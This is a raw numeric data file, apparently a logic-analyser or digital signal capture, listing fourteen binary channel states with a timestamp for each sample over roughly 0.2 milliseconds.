1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5723884e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5723900e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5723924e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5723952e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5723980e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5724004e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5724028e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5724052e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5724076e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5724080e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5724124e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5724152e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5724156e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5724176e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5724200e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5724228e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5724252e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5724256e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5724300e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5724324e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5724332e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5724352e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5724376e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5724400e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5724428e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5724452e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5724476e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5724524e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5724552e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5724576e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5724604e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5724652e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5724676e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5724700e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5724724e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5724748e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5724776e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5724800e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5724828e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5724852e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5724876e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5724880e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5724924e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5724952e-02 1,1,0,0,1,1,0,0,0,0,0,0,0,0,2.5724956e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5724960e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5724976e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5725000e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5725004e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5725052e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5725076e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5725084e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5725100e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5725124e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5725148e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5725176e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5725200e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5725228e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5725252e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5725276e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5725280e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5725324e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5725352e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5725356e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5725376e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5725400e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5725428e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5725452e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5725476e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5725500e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5725524e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5725548e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5725576e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5725600e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5725628e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5725652e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5725676e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5725700e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5725724e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5725748e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5725776e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5725800e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5725828e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5725852e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5725876e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5725900e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5725908e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5725952e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5725976e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5725984e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5726004e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5726028e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5726052e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5726076e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5726100e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5726124e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5726176e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5726204e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5726228e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5726252e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5726276e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5726300e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5726308e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5726324e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5726348e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5726376e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5726400e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5726408e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5726452e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5726476e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5726500e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5726524e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5726548e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5726576e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5726580e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5726628e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5726652e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5726660e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5726676e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5726700e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5726724e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5726748e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5726776e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5726800e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5726852e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5726876e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5726900e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5726924e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5726948e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5726976e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5727004e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5727028e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5727052e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5727076e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5727100e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5727124e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5727148e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5727176e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5727200e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5727228e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5727252e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5727276e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5727324e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5727352e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5727376e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5727400e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5727428e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5727452e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5727456e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5727476e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5727500e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5727524e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5727548e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5727556e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5727604e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5727628e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5727652e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5727676e-02 1,1,0,0,1,0,0,0,0,1,0,0,0,0,2.5727680e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5727684e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5727724e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5727752e-02 1,1,0,0,1,1,0,0,0,0,0,0,0,0,2.5727756e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5727760e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5727776e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5727800e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5727828e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5727852e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5727876e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5727900e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5727924e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5727948e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5727956e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.5728004e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5728028e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5728036e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5728052e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5728076e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5728100e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5728124e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5728148e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5728176e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5728200e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5728228e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5728252e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5728276e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5728300e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5728324e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5728348e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5728376e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5728400e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5728428e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5728452e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5728476e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5728500e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5728524e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5728548e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5728576e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5728600e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5728628e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5728652e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5728676e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5728700e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5728724e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5728748e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5728776e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5728800e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5728828e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5728852e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5728876e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5728900e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5728924e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5728948e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5728976e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5729000e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5729028e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5729052e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5729076e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5729100e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5729124e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5729148e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5729176e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5729200e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5729228e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5729252e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5729276e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5729300e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5729324e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5729348e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5729376e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5729400e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5729428e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5729456e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5729480e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5729508e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5729532e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.5729556e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.5729580e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.5729588e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,1,2.5854008e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,2.5854164e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,1,2.5854180e-02 0,0,1,0,1,1,0,0,0,1,0,1,0,1,2.5854216e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,1,2.5854240e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,1,2.5854548e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,1,2.5854572e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,2.5854580e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,1,2.5854628e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,2.5854652e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,1,2.5854700e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,2.5854724e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,1,2.5854772e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,2.5854800e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5854840e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5854852e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5854876e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5854924e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5854948e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5854972e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5854996e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5855028e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5855048e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5855100e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5855124e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5855172e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5855196e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5855204e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5855252e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5855276e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,2.5855280e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5855284e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5855324e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5855348e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5855400e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5855428e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5855452e-02 0,0,1,0,1,0,0,0,0,1,0,0,0,0,2.5855476e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5855480e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5855500e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5855524e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5855532e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5855572e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5855600e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5855652e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5855676e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5855724e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5855748e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5855844e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5855876e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5855900e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5855924e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5855948e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5855956e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5855972e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5855996e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5856028e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5856072e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5856092e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5856104e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5856116e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5856140e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5856164e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5856184e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5856204e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5856228e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5856252e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5856276e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5856284e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5856356e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5856376e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5856388e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5856436e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5856456e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5856480e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5856500e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5856508e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5856524e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5856548e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5856556e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5856592e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5856612e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5856660e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5856684e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5856748e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5856772e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5856780e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5856796e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5856816e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5856828e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5856840e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5856860e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5856868e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5856884e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5856908e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5856916e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5856952e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5856972e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5857020e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5857044e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5857084e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5857112e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5857156e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5857184e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5857188e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5857208e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5857236e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,2.5857240e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5857244e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5857260e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5857284e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5857288e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5857332e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5857360e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5857364e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5857384e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5857408e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5857436e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5857460e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5857484e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5857508e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5857532e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5857556e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5857564e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5857612e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5857636e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,2.5857640e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5857644e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5857660e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5857684e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5857708e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5857732e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5857756e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5857784e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5857808e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5857836e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5857860e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5857884e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5857908e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5857932e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5857956e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5857984e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5858008e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5858036e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5858060e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5858084e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5858132e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5858160e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5858212e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5858236e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5858244e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5858292e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5858316e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,2.5858320e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5858324e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5858364e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5858388e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5858444e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5858464e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5858488e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5858516e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.5858544e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.5858568e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5858576e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5858620e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5858644e-02 